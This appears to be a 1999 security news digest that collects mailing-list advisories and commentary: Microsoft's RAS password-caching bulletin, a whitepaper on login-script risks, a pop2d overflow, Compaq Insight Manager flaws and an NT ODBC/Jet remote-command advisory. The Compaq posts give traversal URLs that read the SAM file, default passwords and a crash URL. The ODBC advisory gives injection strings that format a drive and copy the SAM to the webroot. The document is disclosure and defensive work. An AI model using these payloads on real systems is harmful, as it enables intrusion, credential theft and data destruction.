Reply From: edison <edison@dhp.com>
A few thoughts on the subject.
First, with the frightening amount of completely unsecured consumer info
sites on (and off) the net today, I would disagree that ICSA's actions
reflect "very badly" on our industry. Because there are much easier
targets, consumerinfo.com can be reasonably certain that it won't even be
attacked for quite some time. At least until most of the rest of the
sites are secure in the same fashion.
Don't get me wrong, I'm not advocating 40-bit encryption as 'secure,' but
it is 'more secure' than nothing at all. And until the ignorant IT
managers with sites on the net clue in, this kind of certification won't
_hurt_ our industry. Please don't attack me - I'm just saying that while
we professionals might recognize weaknesses in this level of security,
those outside don't and "we" still look good to them.
Second, if you've ever been to a hacker BBS/site, you have to know that
getting into Equifax or any other reporting agency is pitifully easy. If
you think 40-bit encryption is weak, how about a 2 character alphanumeric
"password" on accounts that can be pulled from your own credit report?
And for that matter, there are posted algorithms to the account scheme, so
you can even generate your own.
I will agree that there are more unsavory characters on the net than there
are people aware of CBI dialups. But then again, 40-bit crypto is not
exactly _easy_ to crack.
-edison
On Fri, 28 May 1999, cult hero wrote:
> I am becoming concerned about the apparent lack of professional competence
> within even well-known segments of the security community. I hope the
> incident I discovered is an isolated one, but even a single such incident
> is disquieting.
-o-
Subscribe: mail majordomo@repsec.com with "subscribe isn".
Today's ISN Sponsor: OSAll [www.aviary-mag.com]
@HWA
48.0 RAS and RRAS vulnerability
~~~~~~~~~~~~~~~~~~~~~~~~~~
Date: Thu, 27 May 1999 17:18:25 -0400
From: Russ <Russ.Cooper@RC.ON.CA>
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject: Alert: Microsoft Security Bulletin (MS99-017) - RAS & RRAS Passwords
On March 20th, Dieter Goepferich [dieter.goepferich@bigfoot.com]
discovered a vulnerability involving both RAS and RRAS. This was
subsequently reported in Heise Online, a German publication;
http://www.heise.de/newsticker/data/cp-12.04.99-000/
http://www.heise.de/newsticker/data/hos-15.04.99-000/
Dieter originally reported it via some "product improvement suggestion"
web form on www.microsoft.de back in March. Together we informed
Microsoft Security (secure@microsoft.com) back in April.
By default the registry key is only accessible to Administrator and the
user/owner of the passwords, but it represents a potential threat and a
location of password information which would not otherwise be expected.
See;
http://www.microsoft.com/security/bulletins/ms99-017.asp
for the complete write up including fix locations. There are two KB
articles about this (one for RAS, and another for RRAS). They were not
yet available at the time of writing.
RAS
http://support.microsoft.com/support/kb/articles/q230/6/81.asp
RRAS
http://support.microsoft.com/support/kb/articles/q233/3/03.asp
Cheers,
Russ - NTBugtraq Editor
-------------------------------------------------------------------------------
Date: Thu, 27 May 1999 15:14:46 -0700
From: aleph1@UNDERGROUND.ORG
To: BUGTRAQ@netspace.org
Subject: Microsoft Security Bulletin (MS99-017)
The following is a Security Bulletin from the Microsoft Product Security
Notification Service.
Please do not reply to this message, as it was sent from an unattended
mailbox.
********************************
Microsoft Security Bulletin (MS99-017)
--------------------------------------
Patch Available for "RAS and RRAS Password" Vulnerability
Originally Posted: May 27, 1999
Summary
=======
Microsoft has released a patch that eliminates a vulnerability in the
Microsoft (r) Windows NT (r) Remote Access Service (RAS) and Routing and
Remote Access Service (RRAS) clients, in which a user's password is cached
even if the user de-selects the "Save password" option.
Issue
=====
When the client software for Microsoft RAS or RRAS is used to dial into a
server, a dialogue requests the user's userid and password for the server.
On the same dialogue is a checkbox whose caption reads "Save password" and
which is intended to provide the user with the option to cache their
security credentials if desired. However, the implemented client
functionality actually caches the user's credentials regardless of whether
the checkbox is selected or de-selected.
Cached security credentials, which include the password, are stored in the
registry and protected by ACLs whose default values authorize only local
administrators and the user to access them. Windows NT 4.0 Service Pack 4
also provides the ability to strongly encrypt the password data stored in
the registry using the SYSKEY feature.
While there are no reports of customers being adversely affected by this
vulnerability, Microsoft is proactively releasing a patch that restores
correct functionality to the password caching function. The patch should be
applied to all machines that are used as RAS or RRAS clients. It is
important to note that RRAS servers also can be used as RRAS clients, and
any machines used in such a capacity should have the patch applied as well.
Affected Software Versions
==========================
- Microsoft Windows NT Workstation 4.0
- Microsoft Windows NT Server 4.0
- Microsoft Windows NT Server 4.0, Enterprise Edition
What Microsoft is Doing
=======================
Microsoft has released patches that fix the problem identified. The patches
are available for download from the sites listed below in What Customers
Should Do.
Microsoft also has sent this security bulletin to customers
subscribing to the Microsoft Product Security Notification Service.
See http://www.microsoft.com/security/services/bulletin.asp for
more information about this free customer service.
Microsoft has published the following Knowledge Base (KB) article on this
issue:
- Microsoft Knowledge Base (KB) article Q230681,
RAS Credentials Saved when "Save Password" Option Unchecked,
http://support.microsoft.com/support/kb/articles/q230/6/81.asp
- Microsoft Knowledge Base (KB) article Q233303,
RRAS Credentials Saved when "Save Password" Option Unchecked,
http://support.microsoft.com/support/kb/articles/q233/3/03.asp
(Note: It might take 24 hours from the original posting of this bulletin for
the KB article to be visible in the Web-based Knowledge Base.)
What Customers Should Do
========================
Microsoft highly recommends that customers evaluate the degree of risk that
this vulnerability poses to their systems and determine whether to download
and install the patch. The patch can be found at:
- RAS:
ftp://ftp.microsoft.com/bussys/winnt/winnt-public
/fixes/usa/nt40/Hotfixes-PostSP5/RASPassword-fix/
- RRAS:
ftp://ftp.microsoft.com/bussys/winnt/winnt-public
/fixes/usa/nt40/Hotfixes-PostSP5/RRASPassword-fix/
(Note: The URLs above have been wrapped for readability)
More Information
================
Please see the following references for more information related to this
issue.
- Microsoft Security Bulletin MS99-017,
Patch Available for "RAS and RRAS Password Caching"
Vulnerability, (The Web-posted version of this bulletin),
http://www.microsoft.com/security/bulletins/ms99-017.asp.
- Microsoft Knowledge Base (KB) article Q230681,
RAS Credentials Saved when "Save Password" Option Unchecked,
http://support.microsoft.com/support/kb/articles/q230/6/81.asp.
- Microsoft Knowledge Base (KB) article Q233303,
RRAS Credentials Saved when "Save Password" Option Unchecked,
http://support.microsoft.com/support/kb/articles/q233/3/03.asp
Obtaining Support on this Issue
===============================
If you require technical assistance with this issue, please
contact Microsoft Technical Support. For information on
contacting Microsoft Technical Support, please see
http://support.microsoft.com/support/contact/default.asp.
Revisions
=========
- May 27, 1999: Bulletin Created.
For additional security-related information about Microsoft products, please
visit http://www.microsoft.com/security
----------------------------------------------------------------------
THE INFORMATION PROVIDED IN THE MICROSOFT KNOWLEDGE BASE IS PROVIDED "AS IS"
WITHOUT WARRANTY OF ANY KIND. MICROSOFT DISCLAIMS ALL WARRANTIES, EITHER
EXPRESS OR IMPLIED, INCLUDING THE WARRANTIES OF MERCHANTABILITY AND FITNESS
FOR A PARTICULAR PURPOSE. IN NO EVENT SHALL MICROSOFT CORPORATION OR ITS
SUPPLIERS BE LIABLE FOR ANY DAMAGES WHATSOEVER INCLUDING DIRECT, INDIRECT,
INCIDENTAL, CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL DAMAGES,
EVEN IF MICROSOFT CORPORATION OR ITS SUPPLIERS HAVE BEEN ADVISED OF THE
POSSIBILITY OF SUCH DAMAGES. SOME STATES DO NOT ALLOW THE EXCLUSION OR
LIMITATION OF LIABILITY FOR CONSEQUENTIAL OR INCIDENTAL DAMAGES SO THE
FOREGOING LIMITATION MAY NOT APPLY.
(c) 1999 Microsoft Corporation. All rights reserved. Terms of Use.
*******************************************************************
You have received this e-mail bulletin as a result of your registration
to the Microsoft Product Security Notification Service. You may
unsubscribe from this e-mail notification service at any time by sending
an e-mail to MICROSOFT_SECURITY-SIGNOFF-REQUEST@ANNOUNCE.MICROSOFT.COM
The subject line and message body are not used in processing the request,
and can be anything you like.
For more information on the Microsoft Security Notification Service
please visit http://www.microsoft.com/security/bulletin.htm. For
security-related information about Microsoft products, please visit the
Microsoft Security Advisor web site at http://www.microsoft.com/security.
-------------------------------------------------------------------------------
Date: Fri, 28 May 1999 07:59:35 -0400
From: Russ <Russ.Cooper@RC.ON.CA>
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject: Re: Alert: Microsoft Security Bulletin (MS99-017) - RAS & RRAS Passwords
Wow, talk about goofing up.
Eric Schultze correctly pointed out that he, together with Lisa
O'Connor, Martin Dolphin, and Joe Greene reported this problem with RAS
originally way back on March 19th, 1998 <-- (note, 1998, not 1999). See
the original message at;
http://ntbugtraq.ntadvice.com/default.asp?pid=36&sid=1&A2=ind9803&L=ntbu
gtraq&F=P&S=&P=4209
(URL is wrapped).
I, most inappropriately, credited another with the discovery in March of
this year.
It's funny, when David LeBlanc first prompted me about this "discovery"
this year, I could have sworn I'd seen it before but I failed to check
my own archives...tsk tsk...;-]
So, to Lisa, Martin, Joe, and Eric, please accept my humble apologies!
To Microsoft, why the hell did it take a publication in a German
magazine to provoke you to fix something that had been reported here a
full year before?? Could it have been the fact that the 3/99 publication
included an exploit tool? Maybe we need to have an exploit coding group
at NTBugtraq that produces a tool for everything reported and
distributes said tool to all and sundry?
Cheers,
Russ - NTBugtraq Editor
@HWA
49.0 Whitepaper: The Unforeseen Consequences of Login Scripts By Dan Kaminsky
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Seen via PacketStorm, scarfed from : http://doxpara.netpedia.net/login.html
Insecurity By Design:
The Unforeseen Consequences of
Login Scripts
By Dan Kaminsky
A common aspect of most client-server network designs is the login script. A
set of commands executed upon provision of correct username and password,
the login script provides the means for corporate system administrators to
centrally manage their flock of clients. Unfortunately what's seemingly good for
the business turns out to be a disastrous security hole in the University
environment, where students logging into the network from their dorm rooms
now find the network logging into them. This hole provides a single, uniform
point of access to any number of previously uncompromised clients, and is a
severe liability that must be dealt with at the highest urgency. Even those in the
corporate environment should take note of their uncomfortable exposure and
demand a number of security procedures described herein to protect their
networks. One possible solution for some may be the DoxPrint system designed
by this author; it allows users to print to Novell Print Queues over the Network
Neighborhood without requiring any Novell code on the client. Affected
universities should consider switching to systems that do not require full logins,
until more stable and secure systems are available.
What if I told you that every time you turned on your computer, the government
could control exactly what would load? What if, every time you entered your
username and password, your ISP gained the ability to specify exactly what
software should load, what files to send, maybe even what data to erase? What
if, merely by accessing a web page, your system came under the full control of
the page's author, or more accurately any possible author of that page,
authorized or not?
In each case, the security violation is quite obvious. Merely drawing electricity,
connecting to the Internet, or accessing a web page does not constitute an open
license to fully control a computer. In legal terms, each action by the user is an
ongoing communication under contractual obligations--for example, the user
agrees to pay a fee and provide authentication material in the form of username
and password, and in return the ISP agrees to provide Internet access. Never
does the user agree to a "remote root access contract"! Whether this access is,
in fact, used or abused is irrelevant. None of the user's actions constitutes
acceptance of "handing over the keys of the computer" to an external agent.
Of course, sometimes the issue of what, exactly, the term "user" means becomes
muddled. In a corporate environment, the user of the computing environment is
not necessarily its owner, nor is he or she the highest authority regarding what
should or shouldn't run on the machine. Login scripts, composed of lists of
commands to be executed on the client machines upon the correct provision of
username and password, provide a means for the central administrators of
corporate computers to automatically connect to network drives and printers.
They also allow the administrators to load any software they choose upon the
client computers as if the user himself had run it. Anything from Censorware to
remote control software is within the power of the administrator to load. This
freedom to centrally manage systems is extremely powerful. Some would argue
that it's an intrinsic capability of any client-server architecture that claims to be
"ready for the enterprise", as the prospect of physically handling each client
machine is extraordinarily expensive in terms of funds and manpower. With
every major client-server networking architecture automatically executing the
commands contained within login scripts *by default*, it would appear that
networking engineers are serving the perceived requirements of the corporate
mentality quite well.
Small problem: University dorm networks aren't corporate.
The authentication procedures built into Windows NT Domains and Novell
Netware are often used by Universities as a means for controlling access to file
and print resources. Both the University and the student are in an advanced
version of an Internet Service contract, but it's an ISP contract nonetheless. The
user (student) agrees to pay a fee (tuition) and provide authentication material in
the form of username and password, and in return the ISP (University) agrees to
provide access to network resources. Unfortunately, to provide access to file
and print resources, Windows (the predominant computing environment on the
desktop) cannot generally delay the login procedure until the time of actual
usage. Indeed, just as in the corporate world, the system is presumed to be the
property of the institution and the student/employee must thus authenticate him or
herself upon startup of the machine. Also, just as in the corporate world, the
system will by default execute any commands the system administrators have
deemed appropriate.
The school does not own the hardware, nor does it own the operating system
running upon it. Even if it did both, it would not own the data on those systems;
students do not generally relinquish ownership of their own labor to their
educational institution. It is of the highest inappropriateness, then, that University
Information Technology departments receive full access to that which is plainly
not theirs. It's not their faults, really. They just want to track use and prevent
abuse of pseudo-public resources. The only way to do this lies with the
corporate authentication mechanisms within Netware and NT Domains. That the
default setting in both environments is to load any login script provided is the fault
of their respective designers, not of the accidental victims in IT. Ironically, not a
bug but a long standing design decision is responsible for what is likely the
greatest single computer security vulnerability at many universities.
Saying that Login Scripts--something which, for so long, have been considered
as innocuous as an ugly background--are indeed such a powerfully damaging
technology is a strong statement that needs to be backed up. Login Scripts are
so dangerous because they eliminate the most effective element of the security
design behind Windows 95 and Windows 98: Security Through Impossibility.
By default, Windows runs almost no services. You can't telnet in, you can't view
the screen remotely, and there is no sendmail or ftp server with buffers to
overflow. The only common service run is the infamous NetBIOS. The result of
this restrictive environment is interesting: While it's not particularly difficult to
remotely crash a 95/98 machine, it's surprisingly hard to remotely compromise
this erstwhile insecure operating system without at least some interaction from the
user. It's the difference between a locked door and a brick wall.
Some arguably overzealous administrators will use this facet of security to ban
any and all services not explicitly authorized(by an Act of God, usually). This
can be excessive, and often prevents significant educational and productivity
benefits. It's not that services are necessarily worrisome so much as the universal
deployment of identically insecure services with significant value compromisable
by unauthorized access--dedicated servers, unfortunately, have a tendency to fit
very nicely into this category. Sysadmins understand well that since both their
servers are at risk and downtime is expensive, it is necessary to have recent
backups of servers at all times. Sometimes, client desktops are also backed up.
But, in an educational institution, it is grossly improper for the university to have
copies of student/client data. Worse, as most computers ship with no
system-scale tape backup, very few students are able to back up their data.
This means that gigabytes of student data are protected only by the security built
into their operating system. This actually isn't too awful--no default remote
access has its advantages--until the login scripts are compromised. Since the
login scripts reside on servers that in general are never considered fully secure by
nature of the services they run, and which are further targeted due to the high
value gained by a successful penetration, we see the heretofore impossible
compromisation of every single networked Windows station nearly
simultaneously as being only a matter of changing a few commands in a login
script. Crack one server, and you crack a thousand clients whose only "crime"
was stating their identity. That's one tough lesson.
Sadly, some university administrators have responded to this observed threat by
claiming that 1) they'd never maliciously enter anything into the login scripts and
2) they're pretty much the only ones with access to the login scripts, so "nothing
would ever happen." If there was ever a set of famous last words for a system
administrator, these would be them. They've got the keys to systems they don't
own, and it's probable that their users don't even know it. Their intentions are
irrelevant; they're not generally the ones to worry about. As I told one admin,
"It's not you I distrust. It's your computer. Maybe you'll accidentally share the
wrong directory. Maybe you'll be forwarded to a web site that will use a
backdoor to initiate a remote LANMAN authentication. Perhaps a 95/98
machine you logged into as Administrator for the domain will have its .PWL files
cracked. Or maybe somebody will sneak in in the middle of the night and install
a keylogger. With one hack providing access to *everybody*'s machine, it's
worth it for a cracker to attack; isn't it worth it for you to defend?"
If this is making sysadmins in the corporate sector nervous...it should. Yes, the
downside to centralized management is indeed single point of massive failure.
More than ever, businesses are just one disgruntled system administrator away
from a task-scheduled mass virus infection--or worse. While indeed there are
methods for disabling the loading of login scripts, their all-or-nothing nature
makes them unrealistic in many environments. Businesses should not need to
choose between tremendous risk and necessary functionality. Microsoft and
Novell need to implement the following functionality in their login script code:
1) Script Capabilities. Login scripts allow drives to be mounted, printers to be
connected, applications to be loaded from remote drives, and so on. System
administrators need the ability to specify exactly which commands a client
machine should honor. This provides a barrier to abuse--a site that only uses
login scripts to mount network drives should be able to restrict clients to the
degree of functionality the site requires. There are going to be issues, of course,
with executable code on remote drives. To address this, we require...
2) Data Signatures. Cryptographic signatures on executable content, most
commonly used by Microsoft's Authenticode system, provide a means for
insecure systems to verify the appropriateness of remotely executed code.
Sysadmins should be able to "sign" login scripts, as well as commonly executed
remote code, and then specify that unless the client detects a signature from a
"trusted" list, the content should be considered unauthorized. Sysadmins should
also be able to sign actual executables(and maybe even data files) as acceptable
for remote execution.
3) Executable hash checking. A slightly different tact might be to have clients
cache hash values of specific files commonly run. Given a change from one
session to another in the file hash, a trap could be sent to the administrator noting
him or her that a system breach may have occurred. It's one thing to replace the
contents of a file, but it's another to have to operate against the memory of every
client that accessed the old file. This is a useful way to flip the disadvantage of
large numbers of dumb machines into an advantage of intelligent agents with
configurable responses to non-matching hashes.
Of course, the ultimate solution to this issue is to emulate an alternate login
paradigm that Win95/98 implements to some degree. As Russ Cooper, editor
of NTBugTraq, writes:
There is *no need* for a client machine (be it Win9x or NT) to logon in to a domain in
a way that would invoke a login script in order to gain access to its resources. You
log into the machine itself (the client machine), and then connect to the resource
and supply a userID and password. This will establish the connection, without
invoking the login script. Bingo, problem solved, no?
Novell and many other systems need to emulate this usage paradigm post-haste,
and institutions still using full Domain logins must cease as soon as possible.
Universities should consider implementing systems that do not require any form
of login procedure for the user to access his or her own computer. The
reasoning for this is a matter of ownership--what right does a university have to
deny a user access to his or her own computer? Password security is
notoriously bad anyway, and is far too insecure for any degree of
non-repudiability. I'm working on a solution for switched hubs involving using
MAC Caches to allow trustable two-way communication traces.
Those who insist upon using login procedures need to disable them
immediately for dorm-room computers. Students who need to connect to
specific shares should be given a batch script to load--this will, incidentally,
eliminate nasty situations where login scripts appropriate for one
environment(say, the capturing of LPT1 to a printer port) are completely
inappropriate in another(say, when that same user is in their dorm room).
For those administrators running Novell Netware all the way to your student's
desktop, I implore you to evaluate DoxPrint. DoxPrint allows sysadmins to
enjoy most of the advantages of running Netware servers on the backend while
sparing Windows clients the hardship of installing and maintaining the Novell
client code. All access occurs over the Network Neighborhood, and is quite
flexible in its programmability and authentication. It's been tested and proven as
a powerful solution to some of the problems Netware creates.
It's a strange thing, that such a common function would turn out so open for
abuse. System designers who create new functionality need to include security
considerations at every phase of the design process. Any time network access
to a system is introduced, there is a significant burden of functionality upon
the system to verify that the actions executed on behalf of the remote agent
are appropriate. Failure to meet this burden is technical irresponsibility and
must be prevented at all costs.
I am immensely curious as to the reactions of Microsoft, Novell, and any other
administrator who is reading this now. Please, send me your opinions; I'll
publish the best of the replies.
@HWA
50.0 Vulnerability in pop2.imap
~~~~~~~~~~~~~~~~~~~~~~~~~~
Date: Wed, 26 May 1999 20:37:13 +0100
From: Chris Evans <chris@FERRET.LMH.OX.AC.UK>
To: BUGTRAQ@netspace.org
Subject: Remote vulnerability in pop2d
Hi
Firstly, sorry if any details are hazy - this is from memory (it's two
months since I last looked at this). This bug concerns the pop-2 daemon,
which is a part of the Washington University imap package.
I've been waiting for a CERT advisory, but one doesn't seem to be
forthcoming. Two and a half months is a long time. Also, the problem has
been fixed for a long time. I'm posting because
a) A fixed full release is available, so people should know about it
b) The flaw is fairly basic and easy to spot, so active exploitation could
well be happening
Quick details
=============
Compromise possible: remote users can get a shell as user "nobody"
If: running pop-2d v4.4 or earlier
Fixed version: imap-4.5, available now.
Not vulnerable
==============
RedHat-6.0 isn't vulnerable because imap-4.5 was shipped.
Vulnerable
==========
Anyone who shipped the pop-2 component of imap-4.4 or earlier, including
earlier RedHat releases
Details of flaw
===============
pop-2 and pop-3 support the concept of an "anonymous proxy" whereby remote
users can connect and open an imap mailbox on _any server they have a
valid account on_. An attacker connects to the vulnerable pop-2 port and
connects it to an imap server under their control. Once logged on, issuing
a "FOLD" command with a long arg will cause an overflow of a stack based
buffer.
The arg to FOLD must be somewhere around 1000 bytes - not much bigger, not
much smaller. Look at the source.
Additional
==========
I think the concept of "anonymous proxy" is just fundamentally insecure.
It opens up a large code path for remote users to explore, i.e. the
protocol parsing of imap, etc.
The author of imap very responsibly includes a compile time flag to
disable this in 4.5.
Better still, RedHat-6.0 ships with the proxy disabled.
Cheers
Chris
@HWA
51.0 Infosec.19990526.compaq-im.a 'Compaq insight manager vulnerability'
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Date: Wed, 26 May 1999 16:41:36 +0100
From: gabriel.sandberg@INFOSEC.SE
To: BUGTRAQ@netspace.org
Subject: Infosec.19990526.compaq-im.a
Infosec Security Vulnerability Report
No: Infosec.19990526.compaq-im.a
=====================================
Vulnerability Summary
---------------------
Problem: The web server included in Compaq Insight
Manager could expose sensitive information.
Threat: Anyone who has access to port 2301 where
Compaq Insight Manager is installed could get
unrestricted access to the server's disk through
the "root dot dot" bug.
Platform: Detected on Windows NT and Novell Netware servers
running on Compaq hardware.
Solution: Disable the Compaq Insight Manager web server or
restrict anonymous access.
Vulnerability Description
-------------------------
When installing Compaq Insight Manager a web server gets installed. This web
server runs on port 2301 and is vulnerable to the old "root dot dot" bug. This
bug gives unrestricted access to the vulnerable server's disk. It could easily
get exploited with one of the URLs:
http://vulnerable-NT.com:2301/../../../winnt/repair/sam._
http://vulnerable-Netware.com:2301/../../../system/ldremote.ncf
(How many dots there should be is install-dependent)
Solution
--------
You could probably fix the problem by restricting anonymous access to the Compaq
Insight Manager web server. If you are not using the web server, Infosec
recommends disabling the service.
Background
----------
Infosec gives the credits to Master Dogen who first reported the problem
(Windows NT and Compaq Insight Manager) to us and wanted us to go public with a
vulnerability report.
Infosec has found that Novell Netware with Compaq Insight Manager has the same
problem, but it is not as common as on Windows NT.
Compaq Sweden was informed about this problem April 26, 1999.
//Gabriel Sandberg, Infosec
gabriel.sandberg@infosec.se
------------------------------------------------------------------------------
Date: Wed, 26 May 1999 16:13:19 -0500
From: Vacuum <vacuum@SWORD.DAMOCLES.COM>
To: BUGTRAQ@netspace.org
Subject: Re: Infosec.19990526.compaq-im.a
Please disregard previous post, the signature got in the way of a paste
In addition to //Gabriel Sandberg, Infosec gabriel.sandberg@infosec.se's
findings.
Web-Based Management is enabled, by default, when you install the Compaq
Server Management Agents for Windows NT.(CPQWMGMT.EXE) The web-enabled
Compaq Server Management Agents allow you to view subsystem and status
information from a web browser, either locally or remotely. Web-enabled
Service Management Agents are available in all 4.x versions of Insight
Manager.
Compaq HTTP Server Version 1.2.15 (Pre-Release)
The only user accounts available in the Compaq Server Management
Agent WEBEM release are listed below.
http://111.111.111.111:2301/cpqlogin.htm
account anonymous
username anonymous
password
account user
username user
password public
account operator
username operator
password operator
account administrator
username administrator
password administrator
http://111.111.111.111:2301/cpqlogin.htm?ChangePassword=yes
is the url used to change the password. Unfortunately the password is
the only information that can be changed and is stored in
clear text in the following file.
c:\compaq\wbem\cpqhmmd.acl
-------------------------------------------------------------------------------------
Compaq-WBEM-AclFile, 1.1
anonymous anonymous 737EEEFA7617ED94EDD74E659B83035F
login in progress... login in progress...
7A21DD9917C0C23907267FC07DBC7D12
administrator administrator D6022D9B3FCA717CCEED36E640160478
51B02137D6BF719FC62F4940DBE1F3E6
operator operator B5CE548356D1BEA5F1CFEE12FE9502C3
041D1015AEC9F60412C7F86E62D6672C
user user
EC286E733A8892ADFC895611D1557557 C865DE636CA398F8523EDBE5700D457A
Once you have found one wbem enabled machine, using compaq's HTTP
Auto-Discovery Device List http://111.111.111.111:2301/cpqdev.htm
It is trivial to locate other machines.
------------------------------------------------------------------------------
Date: Thu, 27 May 1999 21:43:09 -0500
From: Vacuum <vacuum@SWORD.DAMOCLES.COM>
To: BUGTRAQ@netspace.org
Subject: Re: Infosec.19990526.compaq-im.a (New DoS and correction to my previous post)
Upon further research, I must retract my earlier statement that the
Compaq Insight Manager Web Agent's passwords are stored in clear text.
In fact, what we see in cpqhmmd.acl are the account name and username in
clear text NOT the password.
Explanation of username and password combinations mentioned in my previous
post.
c:\compaq\wbem\cpqhmmd.acl
or
http://111.111.111.111:2301/../../../compaq/wbem/cpqhmmd.acl
cpqhmmd.acl contents:
Compaq-WBEM-AclFile, 1.1
anonymousanonymous737EEEFA7617ED94EDD74E659B83035F
login in progress...login in progress...7A21DD9917C0C23907267FC07DBC7D12
administratoradministrator37741E7AC5B9871F87CE6ABE15B28FCB070293B3998C461D866E277A259619F0
operatoroperatorB5CE548356D1BEA5F1CFEE12FE9502C3041D1015AEC9F60412C7F86E62D6672C
useruserEC286E733A8892ADFC895611D1557557C865DE636CA398F8523EDBE5700D457A
The default usernames and password combinations that I mentioned in my
previous post are still valid.
Once again these are the defaults:
account: anonymous username: anonymous password:
account: user username: user password: public
account: operator username: operator password: operator
account: administrator username: administrator password: administrator
There are three types of data:
Default(read only), Sets(read/write), and Reboot(read/write).
The WebAgent.ini file in the system_root\CpqMgmt\WebAgent directory specifies
the level of user that has access to data. The "read=" and "write=" entries in
the file set the user accounts required for access, where: 0 = No access,
1 = Anonymous, 2 = User, 3 = Operator, and 4 = Administrator.
Changing these entries changes the security. The web-enabled Server Agent
service must be stopped and restarted for any changes to take effect. Do not
modify anything except the read/write levels.
New Denial of service:
Just to make this post somewhat worthwhile.
http://111.111.111.111:2301/AAAAAAAA..... (223 A's seemed to be the minimum)
The first time this occurs, an application error occurs in surveyor.exe
Exception: access violation (0xc0000005), Address: 0x100333e5
If you restart the Insight Web Agent Service and repeat it
will cause an application error in cpqwmget.exe
Exception: access violation(0xc0000005), Address 0x002486d4
The http://111.111.111.111 will no longer respond until the service is
stopped and restarted.
Apologies for my previous error.
vac
------------------------------------------------------------------------------
Date: Fri, 28 May 1999 08:54:10 -0400
From: Ricky Mitchell <rjmitchell@COLUMBIAENERGYGROUP.COM>
To: BUGTRAQ@netspace.org
Subject: second compaq insight manager vulnerability
Greetings,
Yesterday while I was removing the "web insight agent" service from our
vulnerable NT servers, I noticed on some machines that port 2301 was still
vulnerable. To completely remove the problem, make sure you also stop the
"surveyor" service if you have that installed. That will
completely shut off access to port 2301 and plug the hole.
Regards,
Rick Mitchell
NT administrator
Columbia Gas Transmission Corp
@HWA
52.0 Advisory: NT ODBC Remote Compromise
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Date: Tue, 25 May 1999 13:59:30 -0500
From: .rain.forest.puppy. <rfp@WIRETRIP.NET>
To: BUGTRAQ@netspace.org
Subject: Advisory: NT ODBC Remote Compromise
--[ Advisory: NT ODBC Remote Compromise
--[ By Matthew Astley [RCPS] http://www.fruitcake.demon.co.uk
--[ & Rain Forest Puppy [WireTrip] rfp@wiretrip.net
--[ Brief Summary
MS Jet database engine (which runs Access databases) allows an individual
to embed VBA in string expressions, which may allow the individual to run
commandline NT commands. This, combined with the flaw of IIS running ODBC
commands as system_local, allows a remote attacker to have full control of
the system. Other webservers may be affected. Many MS Jet engines are
affected, but may not lead to elevated privileges.
--[ Background
ODBC allows a program flexible access to one or more relational databases
using SQL. If a client fails to quote correctly the meta characters in a
piece of data used in an SQL query, an attacker may be able to interfere
with the tables in the database (see MS SQL appension 'feature' in Phrack
54, article 8).
However, the Microsoft "Jet" database engine (aka MS Access) provides some
extensions to SQL which allow the execution of VBA (Visual Basic for
Applications). This makes holes in meta character quoting code much more
interesting and dangerous.
--[ What form does the hole take?
In SQL, strings must be enclosed in single quotes. If a string includes a
single quote it must be escaped by doubling it up.
The Jet engine extends this by allowing strings to enclose a VBA
expression inside vertical bar characters in the string, like this:
select 'lil'' string | 6+7 | with number' as foo from table;
This will produce a recordset containing one field with the value "lil'
string 13 with number" for each row of the input table. Innocent enough,
if the CGI or ASP programs correctly quote the incoming data.
However, since the pipe operator is a rather obscure character and is very
poorly documented, most people don't know it's there - apparently even
Microsoft programmers.
--[ It's a feature, not a bug!
Note the following excerpt from a MS Knowledge Base article:
(http://support.microsoft.com/support/kb/articles/q147/6/87.asp)
Pipe Character or Vertical Bar
The pipe character or vertical bar is a reserved character for the Jet
database engine. It tells the Jet database engine to evaluate the
identifier before evaluating the rest of the expression. Therefore, the
Jet database engine inserts the value of the identifier in the expression,
and then evaluates it.
Vertical bars are used most often in domain aggregate functions when you
want the function to automatically recalculate the value it returns in
filters. Or vertical bars are used as an alternative to the ampersand (&)
operator when you concatenate text values. Because of this, you cannot
embed the vertical bar (|) in a literal string, you must embed the Chr()
function. Chr(124) is the vertical bar.
--[ Where does it apply?
Any textual data included in a Jet SQL query can contain quoted VBA,
whether it is in data to be inserted in a new record or part of a
condition expression. This makes the hole very general (or flexible, if
you prefer), since you don't need to know the context in which the string
will be evaluated.
--[ What commands are available?
The biggest restriction is that the code must be evaluated in an
expression context - no statements.
Anything listed as "VBA" in the "Functions Reference" page of the Access
Help file will work, although this seems to vary between versions of the
Jet engine - for example, in some cases the "eval" function works and in
others it doesn't (although when it is available, eval doesn't actually
help much because the |...| operator offers a similar if not identical
context).
The most useful command is "shell", although this in itself cannot do
redirections or pipes - cmd.exe can assist with this though. By using the
shell function and running cmd.exe, an attacker can run any command on the
system.
environ() can also be useful to get environment variables values into your
commands, and chr() can be very handy for quoting awkward characters using
alphanumerics and brackets. There are also the standard functions like
iif() and various string operations (use "&" for concatenation).
It would be very difficult to include any kind of loop in the VBA fragment
because loops do not have return values.
--[ Which characters need quoting, and how?
If the exploit string will be passing through anything that tries to
escape special characters then ' will be doubled up - best to use "
instead.
Ironically, the vertical bar character can only be escaped by using it to
evaluate the chr(124) function.
VBA will take pairs of double-quotes (") in a VBA string constant the same
way SQL will take pairs of single-quotes. If this doesn't seem to work you
can always use chr(34).
ASP also provides a convenient debugging aid - if the expression cannot be
correctly evaluated the error message will often include the whole SQL
query with the partially decoded exploit string in it--this could help an
attacker 'tweak' the exploit string until it works.
If the command needs to be broken up with newlines, they can be inserted
between VBA operators inside the |...| construction.
--[ How about a practical example?
An example of a pipeline:
|shell("cmd /c echo " & chr(124) & " format a:")|
will format whatever is in the floppy drive at the time. Any errors will
be silently ignored, although an iconised window will take the focus for
the duration of the command.
Using "cmd /c" allows the command piping necessary to get a newline into
the format command, otherwise the pipe and 'format' are passed as
arguments to 'echo'.
This string can be included in anything from a simple ODBC operation to a
text item in an ASP form on a web page. The function will normally
evaluate to a two or three digit number.
A more sophie's-stick-ate-it example involves grabbing a copy of the SAM:
|shell("cmd /c rdisk /S-")|
|shell("cmd /c copy c:\winnt\repair\sam._ c:\inetput\wwwroot")|
** this example includes assumptions about the location of the
** system and www publishing directory; it's only an example
